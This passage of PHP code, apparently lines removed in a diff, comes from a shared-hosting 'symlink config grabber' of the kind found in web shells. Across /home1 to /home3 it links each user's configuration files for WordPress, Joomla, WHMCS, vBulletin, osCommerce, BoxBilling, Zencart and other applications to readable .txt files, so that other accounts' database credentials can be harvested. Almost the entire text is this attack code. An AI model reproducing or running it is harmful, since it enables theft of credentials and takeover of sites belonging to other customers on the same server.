- @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
- //Home2
- @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
- @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
- @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
- @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
- @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
- @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
- @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
- //Home3
- @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
- @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
- @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
- @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
- @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
